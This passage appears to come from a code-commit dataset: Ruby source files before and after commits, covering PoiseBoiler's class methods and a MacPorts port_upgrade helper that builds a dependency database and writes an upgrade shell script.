    def ensure_logged_in
      doc = agent.get("#{ROOT_URL}/mypage.php")
      raise Error::LoginFailed unless doc.body =~ /logout/
      @member_id = member_id_from_mypage(doc)
    end

    def member_id_from_mypage(doc)
      doc.at('.profile_area a')['href'].match(/(\d+)$/).to_a[1].to_i
    end
  end

  # @private
  class DownloadActionRegistry
    # Collects optional before/after/error callbacks from the DSL block.
    def initialize(&block)
      instance_eval(&block) if block
    end

    def before_each(&block)
      block ? (@before_each = block) : @before_each
    end

    def after_each(&block)
      block ? (@after_each = block) : @after_each
    end

    def on_error(&block)
      block ? (@on_error = block) : @on_error
    end
  end
end
|
#
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'poise_boiler/kitchen'
module PoiseBoiler
  # Whether Halite::SpecHelper should be included when configuring RSpec.
  # Defaults to true until explicitly assigned.
  #
  # BUG FIX: use defined? rather than nil? so an explicit assignment
  # (including nil/false) is distinguishable from "never set".
  def self.include_halite_spec_helper
    defined?(@include_halite_spec_helper) ? @include_halite_spec_helper : true
  end

  def self.include_halite_spec_helper=(val)
    @include_halite_spec_helper = val
  end

  # (see PoiseBoiler::Kitchen.kitchen)
  def self.kitchen(platforms: 'ubuntu-14.04')
    # Alias in a top-level namespace to reduce typing.
    Kitchen.kitchen(platforms: platforms)
  end
end
Move class methods to a class << self because it makes Yard happier and ¯\_(ツ)_/¯.
#
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'poise_boiler/kitchen'
module PoiseBoiler
  class << self
    # @!attribute include_halite_spec_helper
    #   Enable/disable Halite::SpecHelper when configuring RSpec.
    #
    #   @since 1.0.0
    #   @return [Boolean] Include/don't include Halite::SpecHelper.
    #   @example
    #     require 'poise_boiler'
    #     PoiseBoiler.include_halite_spec_helper = false
    #     require 'poise_boiler/spec_helper'
    def include_halite_spec_helper
      return @include_halite_spec_helper if defined?(@include_halite_spec_helper)
      true
    end

    attr_writer :include_halite_spec_helper

    # (see PoiseBoiler::Kitchen.kitchen)
    def kitchen(platforms: 'ubuntu-14.04')
      # Shorthand in the top-level namespace to reduce typing.
      Kitchen.kitchen(platforms: platforms)
    end
  end
end
|
#
# ports_helpers.rb: Utility classes for dealing with ports data.
#
# ====================================================================
# Copyright (c) 2008 Tony Doan <tdoan@tdoan.com>. All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://github.com/tdoan/port_upgrade/tree/master/COPYING.
# If newer versions of this license are posted there, you may use a
# newer version instead, at your option.
# ====================================================================
#
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'bz2'
require 'find'
require 'sqlite3'
class String
  # Replace characters that are awkward in identifiers (space, '+', '/',
  # '.', '-') with underscores; returns a new string.
  def dot_clean
    tr(' +/.-', '_')
  end
end
module Ports
# Library version.
VERSION = '0.0.4'
# Where MacPorts stores installation receipts.
RECEIPT_PATH = '/opt/local/var/macports/receipts'
# Local rsync mirror of the MacPorts ports tree.
MACPORTS_DB='/opt/local/var/macports/sources/rsync.macports.org/release/ports'
CONFIG_FILE = 'port_upgrade.conf'
# Dependency-graph edge: +port+ depends on +dep+, discovered at +level+.
Struct.new('Edge',:port,:dep,:level)
class Struct::Edge
  # Lexicographic ordering over (port, dep, level): compare ports first,
  # then deps, then levels.
  def <=>(other)
    [port, dep, level] <=> [other.port, other.dep, other.level]
  end
end
class Utilities
  # Placeholder for a breadth-first traversal; not yet implemented.
  def breadth_first
  end

  # Compare two version strings via the Version helper class.
  # Returns -1, 0 or 1.
  def self.cmp_vers(versa, versb)
    Version.new(versa) <=> Version.new(versb)
  end
end
# Placeholder for a single port entry; no behaviour defined yet.
class Port
end
class PortTree
# pdb  - ports database wrapper exposing a SQLite handle via #db
# path - optional receipts directory (defaults to RECEIPT_PATH when nil)
# Populates the ports/deps tables by walking the receipts on disk.
def initialize(pdb,path=nil)
@path=path
@edges_seen = []
@pdb = pdb
traverse_receipts
end
# Number of rows in the ports table.
def size
  count = nil
  @pdb.db.query("select count(*) from ports") do |results|
    count = results.first[0].to_i
  end
  count
end
# Receipts directory override, falling back to the MacPorts default.
def receipt_path
@path || RECEIPT_PATH
end
# All (port, variant) rows, ordered by port name.
def dump_tree
  rows = nil
  @pdb.db.query("select port,variant from ports order by port") do |results|
    rows = results.to_a
  end
  rows
end
# Names of all installed ports, ordered alphabetically.
def installed
  names = nil
  @pdb.db.query("select port from ports order by port") do |results|
    names = results.to_a.flatten
  end
  names
end
def dump_seq(outdated)
#setup_remports(outdated) unless outdated.nil?
end
def setup_remports(outdated)
begin
@pdb.db.execute("drop table remports")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table remports(port text, dep text)")
@pdb.db.execute("create unique index remportsdep on remports(port,dep)")
outdated.each do |a|
parents = get_parent_pairs(a)
begin
parents.each do |p|
@pdb.db.execute("insert or ignore into remports values(\"#{p.port}\",\"#{p.dep}\")")
end
rescue SQLite3::SQLException => exp
$stderr.puts "Dup insert into remports: #{exp}}" if $DEBUG
end
@pdb.db.execute("insert into remports values(\"#{a}\",\"\")")
end
@pdb.db.execute('delete from remports where port="gimp-app" and dep="gimp"')
#File.open("remtree.dot",'w') do |f|
# pt = table_to_tree('remports','remports','port','port','dep')
# f.write(pt.to_dot)
#end
end
private
def traverse_receipts
begin
@pdb.db.execute("drop table ports")
@pdb.db.execute("drop table deps")
rescue SQLite3::SQLException
end
@pdb.db.execute("create table ports(port text,version text, variant text)")
@pdb.db.execute("create table deps(port text, dep text)")
@pdb.db.execute("create unique index uniqdep on deps(port,dep)")
receipt_size = receipt_path.split("/").size
Find.find(receipt_path) do |filename|
next unless filename =~ /.bz2$/
next unless File.stat(filename).file?
pieces = filename.split("/")
next unless (pieces.size - receipt_size) == 3
original_portname = pieces[-3]
md = /([^+]+)((\+\w+)*)/.match(pieces[-2]) #seperate version from variants
version = md[1]
variant = md[2]
portname = filename.split("/")[-3].gsub(/(-|\.|\/)/,'_') #very unix centric
@pdb.db.execute("insert into ports values(?,?,?)",original_portname,version,variant)
#portnames << "#{portname}"
reader = BZ2::Reader.new(File.open(filename))
receipt_lines = reader.readlines
reader.close
receipt_lines.each do |l|
if l =~ /depends_lib (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":").last.gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
if l =~ /depends_run (\{([^}]*)\}|([^ ]*))/
deps = $2||$3
deps.split(" ").each do |d|
original_depname = d.split(":").last
depname = d.split(":")[1].gsub(/(-|\.|\/)/,'_')
begin
@pdb.db.execute("insert into deps values(?,?)",original_portname,original_depname)
rescue SQLite3::SQLException
end
end
end
end
end
end
def get_parent_pairs(portname,i=1)
$stderr.puts "get_parent_pairs: #{portname}, #{i}" if $DEBUG
rs = @pdb.db.query("select * from deps where dep = ?", portname)
res = rs.to_a
if res.size == 0
parents = []
else
parents = res.collect{|r| Struct::Edge.new(r[0],portname,i)}
res.each do |r|
if (@edges_seen.find{|o| o === [r[0],portname]}).nil?
@edges_seen << [r[0],portname]
gp = get_parent_pairs(r[0],i+1)
parents += gp unless gp.size == 0
end
end
end
rs.close
parents.uniq
end
end
class PortsDB
  # Facade over an in-memory SQLite database describing installed MacPorts
  # ports, their dependency edges, and optional user configuration.
  def initialize(path = nil, outdated = nil)
    @db = SQLite3::Database.new(':memory:')
    @pt = PortTree.new(self, path)
    @installed = @pt.installed
    @outdated = outdated
    @to_remove = nil
    config_file = locate_config_file
    unless config_file.nil?
      begin
        @config = YAML::load(File.open(config_file))
        # YAML::load returns false for an empty document -- use empty config.
        @config = {} if @config == false
      rescue Errno::ENOENT
        $stderr.puts("No configuration loaded.")
      end
    else
      $stderr.puts("No configuration loaded.")
    end
  end

  # First readable config file out of <app>/etc/port_upgrade.conf and
  # ~/.port_upgrade.conf, or nil.
  def locate_config_file
    to_search = []
    local_dir = File.dirname($0).sub(/bin$/, "")
    local_dir = local_dir == "" ? "." : local_dir
    to_search << File.join(local_dir, "etc", Ports::CONFIG_FILE)
    to_search << File.join(ENV['HOME'], "." + Ports::CONFIG_FILE)
    to_search.each do |path|
      return path if File.readable?(path)
    end
    return nil
  end

  # Sorted port names captured at construction time.
  def installed
    @installed
  end

  # Raw SQLite handle (also used by the PortTree).
  def db
    @db
  end

  def close
    @db.close
  end

  def port_tree
    @pt
  end

  # (port, variant) pairs of everything installed.
  # Fix: delegate to the PortTree. @installed is a plain Array of names, so
  # the previous `@installed.dump_tree` always raised NoMethodError.
  def dump_tree
    @pt.dump_tree
  end

  # Distinct ports slated for removal (computed once and memoized).
  def to_remove
    return @to_remove unless @to_remove.nil?
    @pt.setup_remports(outdated)
    @db.query("select distinct port from remports order by port") do |rs|
      @to_remove = rs.to_a
    end
  end

  # Pop the current leaves (ports nothing else depends on) off `remports`
  # and return them; repeated calls peel the removal tree layer by layer.
  def get_leaves
    $stderr.print "get_leaves " if $DEBUG
    rs = @db.query('select port from remports')
    ports = rs.to_a.flatten.sort.uniq
    rs.close
    $stderr.print "ports: #{ports.size} " if $DEBUG
    rs = @db.query('select dep from remports')
    deps = rs.to_a.flatten.sort.uniq
    rs.close
    $stderr.print "deps: #{deps.size} " if $DEBUG
    diff = (ports - deps).sort
    $stderr.puts "diff: #{diff.size}" if $DEBUG
    diff.each { |p| @db.execute("delete from remports where port = ?", p) }
    diff
  end

  def set_outdated(out)
    @outdated = out
  end

  # Determine which installed ports are older than the Portfile in the
  # ports tree.  Memoized unless `reload` is true.
  def outdated(reload = false)
    return @outdated unless @outdated.nil? or reload == true
    @outdated = []
    @installed.each do |port|
      d = File.join(@pt.receipt_path, port)
      # [2..-1] skips "." and ".." -- assumes they are the first entries.
      Dir.entries(d)[2..-1].each do |version|
        d2 = File.join(d, version, 'receipt.bz2')
        reader = BZ2::Reader.new(File.new(d2))
        lines = reader.readlines
        cats = []
        lines.collect do |line|
          md = /categories (\{([^}]*)\}|([^ ]*))/.match(line)
          unless md.nil?
            cats << (md[2].nil? ? md[1] : md[2].split.first)
          end
        end
        portfile_path = File.join(MACPORTS_DB, cats.flatten, port, 'Portfile')
        unless File.exist?(portfile_path)
          # Receipt category was wrong or renamed: brute-force search every
          # category directory for the port's Portfile.
          $stderr.puts "Searching for #{port}'s Portfile"
          Dir.entries(MACPORTS_DB).each do |d|
            if File.directory?(File.join(MACPORTS_DB, d)) && d != '.' && d != '..'
              testpath = File.join(MACPORTS_DB, d, port, 'Portfile')
              if File.exist?(testpath)
                portfile_path = testpath
                break
              end
            end
          end
        end
        if File.exist?(portfile_path)
          curver = Portfile.new(portfile_path).version
          $stderr.puts("#{port}: #{version.split('+').first}, #{curver}") if $verbose
          cmp = Ports::Utilities.cmp_vers(version.split('+').first, curver)
          if cmp.nil?
            $stderr.puts "Unable to compare versions: #{[port]}"
          else
            if cmp < 0
              @outdated << port
            end
          end
        else
          $stderr.puts "Unable to process Portfile (File Not Found) for #{port}"
        end
      end
    end
    @outdated.uniq
  end

  # Write a shell script that uninstalls the removal set leaves-first and
  # then reinstalls the ports, with per-port hooks from the config file.
  def upgrade(path = 'port_upgrade.sh')
    @pt.setup_remports(outdated) if @to_remove.nil?
    remports = []
    remvariants = Hash.new { |h, k| h[k] = Array.new }
    stmt = @db.prepare("select count(*) from remports")
    dotsh = File.new(path, 'w')
    dotsh.chmod(0700)
    $stderr.puts "port_upgrade.sh open for write" if $DEBUG
    dotsh.puts("#!/bin/sh")
    while stmt.execute.to_a.first[0].to_i > 0
      temp = get_leaves
      break if temp.size == 0
      temp.each do |o|
        @db.query("select port,version,variant from ports where port = ?", o) do |rs|
          installed = rs.to_a
          installed.each do |port|
            bu = get_before_uninstall(port[0])
            dotsh.puts(bu) unless bu.nil?
            dotsh.puts("port uninstall #{port[0]} @#{port[1]}#{port[2]} || exit -1")
            au = get_after_uninstall(port[0])
            dotsh.puts(au) unless au.nil?
            remports.push(port[0])
            remvariants[port[0]].push(port[2])
          end
        end
      end
    end
    remports.uniq!
    while remports.size > 0
      port = remports.pop
      if remvariants[port].uniq.size > 1
        $stderr.puts "Found multiple variants for #{port}."
        variantindex = choose_variant(port, remvariants[port])
      else
        variantindex = 0
      end
      bi = get_before_install(port)
      dotsh.puts(bi) unless bi.nil?
      dotsh.puts("port #{get_force(port)} -x install #{port} #{remvariants[port][variantindex]} || exit -1")
      ai = get_after_install(port)
      dotsh.puts(ai) unless ai.nil?
    end
    # Fix: flush and release the script file instead of leaking the handle.
    dotsh.close
    stmt.close
    true
  end

  # "-f" when the config asks for a forced install of this port.
  def get_force(portname)
    force = get_port_action(portname, :force_install)
    if force
      return "-f"
    else
      return ""
    end
  end

  def get_before_uninstall(portname)
    get_port_action(portname, :before_uninstall)
  end

  def get_after_uninstall(portname)
    get_port_action(portname, :after_uninstall)
  end

  def get_before_install(portname)
    get_port_action(portname, :before_install)
  end

  def get_after_install(portname)
    get_port_action(portname, :after_install)
  end

  private

  # Look up config[:actions][portname][type]; nil when any level is absent.
  def get_port_action(portname, type)
    unless @config.nil?
      if @config.has_key?(:actions)
        if @config[:actions].has_key?(portname)
          if @config[:actions][portname].has_key?(type)
            @config[:actions][portname][type]
          else
            nil
          end
        end
      end
    end
  end

  # Interactively ask which variant to keep when a port was installed with
  # several; returns the chosen index into `variants`.
  def choose_variant(portname, variants)
    answer = false
    while (!answer)
      $stderr.puts "Please choose from list:"
      variants.each_with_index { |v, i| $stderr.puts "#{i}: #{v == "" ? "(none)" : v}" }
      $stderr.print "> "
      reply = $stdin.gets
      clean = (reply.strip =~ /-?[0-9]+/)
      if (clean == 0)
        answer = true
      else
        $stderr.puts "ERROR, try again."
      end
    end
    return reply.to_i
  end
end
# Lazily extracts a "version_revision" string from a MacPorts Portfile.
class Portfile
def initialize(path)
@path = path
end
# Version string, computed once and memoized.
def version
@version ||= find_vers
end
private
# Line-oriented scrape of the (Tcl) Portfile: records `set` variables,
# expands ${var} references inside the version value, and appends the
# revision (defaulting to "0") as "<version>_<revision>".
# NOTE(review): the file handle is never closed explicitly.
def find_vers
v=nil
rev=nil
vars = {}
portfile = File.new(@path)
portfile.each do |line|
case line
when /^set\s+(\S+)\s+(\S+)/
# Tcl variable definition -- remember for later ${...} expansion.
vars[$1] = $2
#$stderr.puts "Var: #{$1} Val: #{$2}"
when /^version\s+([^\s]+)/
v = $1
# Substitute ${var} references until none remain or one is unknown.
while(v =~ /(\$\{([^}]+)\})/) do
if vars.has_key?($2)
v[$1] = vars[$2]
else
break
end
#$stderr.puts "\n\nREPLACE(#{@path}): #{$1} #{vars[$2]} #{v}\n"
end
#break
when /^revision\s+([^\s]+)/
rev = $1
#$stderr.puts "revision found #{rev}"
when /(\w+\.setup\s+\{[^\}]+\}\s+([^\s]+)|^\w+\.setup\s+[^ ]+ (.*))/
# "*.setup ..." style ports declare the version via the setup call.
v = $2 || $3 if v.nil?
break
when /(\S+)\s+([^$]+)$/
# Fallback: treat generic "name value" lines as variable definitions.
vars[$1] = $2
end
end
rev = "0" if rev.nil?
v = v +"_"+rev
return v
end
end
end
Fix issue where there is more than one version of a port to be uninstalled.
#
# ports_helpers.rb: Utility classes for dealing with ports data.
#
# ====================================================================
# Copyright (c) 2008 Tony Doan <tdoan@tdoan.com>. All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://github.com/tdoan/port_upgrade/tree/master/COPYING.
# If newer versions of this license are posted there, you may use a
# newer version instead, at your option.
# ====================================================================
#
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'bz2'
require 'find'
require 'sqlite3'
class String
  # Replace the separator characters space, '+', '/', '.' and '-' with
  # underscores, returning a new string (the receiver is untouched).
  def dot_clean
    tr(' +/.-', '_')
  end
end
module Ports
VERSION = '0.0.4'
RECEIPT_PATH = '/opt/local/var/macports/receipts'
MACPORTS_DB='/opt/local/var/macports/sources/rsync.macports.org/release/ports'
CONFIG_FILE = 'port_upgrade.conf'
Struct.new('Edge',:port,:dep,:level)
class Struct::Edge
  # Total ordering for dependency edges: compare by port first, then by
  # dep, then by level (exactly equal triples compare as 0).
  def <=>(other)
    [port, dep, level] <=> [other.port, other.dep, other.level]
  end
end
# Small static helpers shared by the ports tooling.
class Utilities
# Placeholder -- never implemented.
def breadth_first
end
# Compare two MacPorts version strings; returns -1/0/1 (or nil when they
# cannot be compared).
# NOTE(review): relies on a Version class defined elsewhere in this
# project -- not visible in this file.
def self.cmp_vers(versa,versb)
va = Version.new(versa)
vb = Version.new(versb)
return va <=> vb
end
end
# Placeholder model class for a single port; intentionally empty.
class Port
end
class PortTree
  # Scans the on-disk MacPorts receipts into the `ports` and `deps` tables
  # of the supplied PortsDB and answers queries about the dependency tree.
  def initialize(pdb, path = nil)
    @path = path
    @edges_seen = [] # (port, dep) pairs already visited -- cycle guard
    @pdb = pdb
    traverse_receipts
  end

  # Number of installed port rows.
  def size
    s = nil
    @pdb.db.query("select count(*) from ports") do |results|
      s = results.first[0].to_i
    end
    return s
  end

  # Receipt directory being scanned (constructor override or system default).
  def receipt_path
    @path || RECEIPT_PATH
  end

  # All (port, variant) rows ordered by port name.
  def dump_tree
    ports = nil
    @pdb.db.query("select port,variant from ports order by port") do |results|
      ports = results.to_a
    end
    ports
  end

  # Flat sorted list of installed port names.
  def installed
    ports = nil
    @pdb.db.query("select port from ports order by port") do |results|
      ports = results.to_a.flatten
    end
    ports
  end

  # Historical no-op kept for interface compatibility.
  def dump_seq(outdated)
    #setup_remports(outdated) unless outdated.nil?
  end

  # Rebuild `remports`: every outdated port plus everything that
  # (transitively) depends on one -- the full set that must be removed.
  def setup_remports(outdated)
    begin
      @pdb.db.execute("drop table remports")
    rescue SQLite3::SQLException
      # table did not exist yet -- nothing to drop
    end
    @pdb.db.execute("create table remports(port text, dep text)")
    @pdb.db.execute("create unique index remportsdep on remports(port,dep)")
    outdated.each do |a|
      parents = get_parent_pairs(a)
      begin
        parents.each do |p|
          @pdb.db.execute("insert or ignore into remports values(\"#{p.port}\",\"#{p.dep}\")")
        end
      rescue SQLite3::SQLException => exp
        $stderr.puts "Dup insert into remports: #{exp}}" if $DEBUG
      end
      # "or ignore": a port installed in more than one version (or
      # reachable twice) must not raise a unique-constraint violation.
      @pdb.db.execute("insert or ignore into remports values(\"#{a}\",\"\")")
    end
    # gimp-app <-> gimp form a dependency cycle; break it explicitly.
    @pdb.db.execute('delete from remports where port="gimp-app" and dep="gimp"')
  end

  private

  # Walk every receipt.bz2 below receipt_path
  # (layout: <root>/<port>/<version>[+variant...]/receipt.bz2) and fill the
  # `ports` and `deps` tables.  The old unused `portname`/`depname` locals
  # have been dropped; one of them (`d.split(":")[1]`) crashed on
  # dependency specs that contain no ':'.
  def traverse_receipts
    begin
      @pdb.db.execute("drop table ports")
      @pdb.db.execute("drop table deps")
    rescue SQLite3::SQLException
      # first run -- nothing to drop
    end
    @pdb.db.execute("create table ports(port text,version text, variant text)")
    @pdb.db.execute("create table deps(port text, dep text)")
    @pdb.db.execute("create unique index uniqdep on deps(port,dep)")
    receipt_size = receipt_path.split("/").size
    Find.find(receipt_path) do |filename|
      next unless filename =~ /.bz2$/
      next unless File.stat(filename).file?
      pieces = filename.split("/")
      next unless (pieces.size - receipt_size) == 3
      original_portname = pieces[-3]
      md = /([^+]+)((\+\w+)*)/.match(pieces[-2]) # separate version from variants
      version = md[1]
      variant = md[2]
      @pdb.db.execute("insert into ports values(?,?,?)", original_portname, version, variant)
      reader = BZ2::Reader.new(File.open(filename))
      receipt_lines = reader.readlines
      reader.close
      receipt_lines.each do |l|
        # Record one `deps` row per dependency; specs look like
        # "lib:libfoo:portname" -- keep the text after the last ':'.
        if l =~ /depends_lib (\{([^}]*)\}|([^ ]*))/
          deps = $2 || $3
          deps.split(" ").each do |d|
            original_depname = d.split(":").last
            begin
              @pdb.db.execute("insert into deps values(?,?)", original_portname, original_depname)
            rescue SQLite3::SQLException
              # duplicate (port, dep) edge -- ignore
            end
          end
        end
        if l =~ /depends_run (\{([^}]*)\}|([^ ]*))/
          deps = $2 || $3
          deps.split(" ").each do |d|
            original_depname = d.split(":").last
            begin
              @pdb.db.execute("insert into deps values(?,?)", original_portname, original_depname)
            rescue SQLite3::SQLException
              # duplicate (port, dep) edge -- ignore
            end
          end
        end
      end
    end
  end

  # Recursively collect Edge structs for every port that depends on
  # `portname` (directly or transitively); `i` is the recursion depth.
  def get_parent_pairs(portname, i = 1)
    $stderr.puts "get_parent_pairs: #{portname}, #{i}" if $DEBUG
    rs = @pdb.db.query("select * from deps where dep = ?", portname)
    res = rs.to_a
    if res.size == 0
      parents = []
    else
      parents = res.collect { |r| Struct::Edge.new(r[0], portname, i) }
      res.each do |r|
        if (@edges_seen.find { |o| o === [r[0], portname] }).nil?
          @edges_seen << [r[0], portname]
          gp = get_parent_pairs(r[0], i + 1)
          parents += gp unless gp.size == 0
        end
      end
    end
    rs.close
    parents.uniq
  end
end
class PortsDB
  # Facade over an in-memory SQLite database describing installed MacPorts
  # ports, their dependency edges, and optional user configuration.
  def initialize(path = nil, outdated = nil)
    @db = SQLite3::Database.new(':memory:')
    @pt = PortTree.new(self, path)
    @installed = @pt.installed
    @outdated = outdated
    @to_remove = nil
    config_file = locate_config_file
    unless config_file.nil?
      begin
        @config = YAML::load(File.open(config_file))
        # YAML::load returns false for an empty document -- use empty config.
        @config = {} if @config == false
      rescue Errno::ENOENT
        $stderr.puts("No configuration loaded.")
      end
    else
      $stderr.puts("No configuration loaded.")
    end
  end

  # First readable config file out of <app>/etc/port_upgrade.conf and
  # ~/.port_upgrade.conf, or nil.
  def locate_config_file
    to_search = []
    local_dir = File.dirname($0).sub(/bin$/, "")
    local_dir = local_dir == "" ? "." : local_dir
    to_search << File.join(local_dir, "etc", Ports::CONFIG_FILE)
    to_search << File.join(ENV['HOME'], "." + Ports::CONFIG_FILE)
    to_search.each do |path|
      return path if File.readable?(path)
    end
    return nil
  end

  # Sorted port names captured at construction time.
  def installed
    @installed
  end

  # Raw SQLite handle (also used by the PortTree).
  def db
    @db
  end

  def close
    @db.close
  end

  def port_tree
    @pt
  end

  # (port, variant) pairs of everything installed.
  # Fix: delegate to the PortTree. @installed is a plain Array of names, so
  # the previous `@installed.dump_tree` always raised NoMethodError.
  def dump_tree
    @pt.dump_tree
  end

  # Distinct ports slated for removal (computed once and memoized).
  def to_remove
    return @to_remove unless @to_remove.nil?
    @pt.setup_remports(outdated)
    @db.query("select distinct port from remports order by port") do |rs|
      @to_remove = rs.to_a
    end
  end

  # Pop the current leaves (ports nothing else depends on) off `remports`
  # and return them; repeated calls peel the removal tree layer by layer.
  def get_leaves
    $stderr.print "get_leaves " if $DEBUG
    rs = @db.query('select port from remports')
    ports = rs.to_a.flatten.sort.uniq
    rs.close
    $stderr.print "ports: #{ports.size} " if $DEBUG
    rs = @db.query('select dep from remports')
    deps = rs.to_a.flatten.sort.uniq
    rs.close
    $stderr.print "deps: #{deps.size} " if $DEBUG
    diff = (ports - deps).sort
    $stderr.puts "diff: #{diff.size}" if $DEBUG
    diff.each { |p| @db.execute("delete from remports where port = ?", p) }
    diff
  end

  def set_outdated(out)
    @outdated = out
  end

  # Determine which installed ports are older than the Portfile in the
  # ports tree.  Memoized unless `reload` is true.
  def outdated(reload = false)
    return @outdated unless @outdated.nil? or reload == true
    @outdated = []
    @installed.each do |port|
      d = File.join(@pt.receipt_path, port)
      # [2..-1] skips "." and ".." -- assumes they are the first entries.
      Dir.entries(d)[2..-1].each do |version|
        d2 = File.join(d, version, 'receipt.bz2')
        reader = BZ2::Reader.new(File.new(d2))
        lines = reader.readlines
        cats = []
        lines.collect do |line|
          md = /categories (\{([^}]*)\}|([^ ]*))/.match(line)
          unless md.nil?
            cats << (md[2].nil? ? md[1] : md[2].split.first)
          end
        end
        portfile_path = File.join(MACPORTS_DB, cats.flatten, port, 'Portfile')
        unless File.exist?(portfile_path)
          # Receipt category was wrong or renamed: brute-force search every
          # category directory for the port's Portfile.
          $stderr.puts "Searching for #{port}'s Portfile"
          Dir.entries(MACPORTS_DB).each do |d|
            if File.directory?(File.join(MACPORTS_DB, d)) && d != '.' && d != '..'
              testpath = File.join(MACPORTS_DB, d, port, 'Portfile')
              if File.exist?(testpath)
                portfile_path = testpath
                break
              end
            end
          end
        end
        if File.exist?(portfile_path)
          curver = Portfile.new(portfile_path).version
          $stderr.puts("#{port}: #{version.split('+').first}, #{curver}") if $verbose
          cmp = Ports::Utilities.cmp_vers(version.split('+').first, curver)
          if cmp.nil?
            $stderr.puts "Unable to compare versions: #{[port]}"
          else
            if cmp < 0
              @outdated << port
            end
          end
        else
          $stderr.puts "Unable to process Portfile (File Not Found) for #{port}"
        end
      end
    end
    @outdated.uniq
  end

  # Write a shell script that uninstalls the removal set leaves-first and
  # then reinstalls the ports, with per-port hooks from the config file.
  def upgrade(path = 'port_upgrade.sh')
    @pt.setup_remports(outdated) if @to_remove.nil?
    remports = []
    remvariants = Hash.new { |h, k| h[k] = Array.new }
    stmt = @db.prepare("select count(*) from remports")
    dotsh = File.new(path, 'w')
    dotsh.chmod(0700)
    $stderr.puts "port_upgrade.sh open for write" if $DEBUG
    dotsh.puts("#!/bin/sh")
    while stmt.execute.to_a.first[0].to_i > 0
      temp = get_leaves
      break if temp.size == 0
      temp.each do |o|
        @db.query("select port,version,variant from ports where port = ?", o) do |rs|
          installed = rs.to_a
          installed.each do |port|
            bu = get_before_uninstall(port[0])
            dotsh.puts(bu) unless bu.nil?
            dotsh.puts("port uninstall #{port[0]} @#{port[1]}#{port[2]} || exit -1")
            au = get_after_uninstall(port[0])
            dotsh.puts(au) unless au.nil?
            remports.push(port[0])
            remvariants[port[0]].push(port[2])
          end
        end
      end
    end
    remports.uniq!
    while remports.size > 0
      port = remports.pop
      if remvariants[port].uniq.size > 1
        $stderr.puts "Found multiple variants for #{port}."
        variantindex = choose_variant(port, remvariants[port])
      else
        variantindex = 0
      end
      bi = get_before_install(port)
      dotsh.puts(bi) unless bi.nil?
      dotsh.puts("port #{get_force(port)} -x install #{port} #{remvariants[port][variantindex]} || exit -1")
      ai = get_after_install(port)
      dotsh.puts(ai) unless ai.nil?
    end
    # Fix: flush and release the script file instead of leaking the handle.
    dotsh.close
    stmt.close
    true
  end

  # "-f" when the config asks for a forced install of this port.
  def get_force(portname)
    force = get_port_action(portname, :force_install)
    if force
      return "-f"
    else
      return ""
    end
  end

  def get_before_uninstall(portname)
    get_port_action(portname, :before_uninstall)
  end

  def get_after_uninstall(portname)
    get_port_action(portname, :after_uninstall)
  end

  def get_before_install(portname)
    get_port_action(portname, :before_install)
  end

  def get_after_install(portname)
    get_port_action(portname, :after_install)
  end

  private

  # Look up config[:actions][portname][type]; nil when any level is absent.
  def get_port_action(portname, type)
    unless @config.nil?
      if @config.has_key?(:actions)
        if @config[:actions].has_key?(portname)
          if @config[:actions][portname].has_key?(type)
            @config[:actions][portname][type]
          else
            nil
          end
        end
      end
    end
  end

  # Interactively ask which variant to keep when a port was installed with
  # several; returns the chosen index into `variants`.
  def choose_variant(portname, variants)
    answer = false
    while (!answer)
      $stderr.puts "Please choose from list:"
      variants.each_with_index { |v, i| $stderr.puts "#{i}: #{v == "" ? "(none)" : v}" }
      $stderr.print "> "
      reply = $stdin.gets
      clean = (reply.strip =~ /-?[0-9]+/)
      if (clean == 0)
        answer = true
      else
        $stderr.puts "ERROR, try again."
      end
    end
    return reply.to_i
  end
end
# Lazily extracts a "version_revision" string from a MacPorts Portfile.
class Portfile
def initialize(path)
@path = path
end
# Version string, computed once and memoized.
def version
@version ||= find_vers
end
private
# Line-oriented scrape of the (Tcl) Portfile: records `set` variables,
# expands ${var} references inside the version value, and appends the
# revision (defaulting to "0") as "<version>_<revision>".
# NOTE(review): the file handle is never closed explicitly.
def find_vers
v=nil
rev=nil
vars = {}
portfile = File.new(@path)
portfile.each do |line|
case line
when /^set\s+(\S+)\s+(\S+)/
# Tcl variable definition -- remember for later ${...} expansion.
vars[$1] = $2
#$stderr.puts "Var: #{$1} Val: #{$2}"
when /^version\s+([^\s]+)/
v = $1
# Substitute ${var} references until none remain or one is unknown.
while(v =~ /(\$\{([^}]+)\})/) do
if vars.has_key?($2)
v[$1] = vars[$2]
else
break
end
#$stderr.puts "\n\nREPLACE(#{@path}): #{$1} #{vars[$2]} #{v}\n"
end
#break
when /^revision\s+([^\s]+)/
rev = $1
#$stderr.puts "revision found #{rev}"
when /(\w+\.setup\s+\{[^\}]+\}\s+([^\s]+)|^\w+\.setup\s+[^ ]+ (.*))/
# "*.setup ..." style ports declare the version via the setup call.
v = $2 || $3 if v.nil?
break
when /(\S+)\s+([^$]+)$/
# Fallback: treat generic "name value" lines as variable definitions.
vars[$1] = $2
end
end
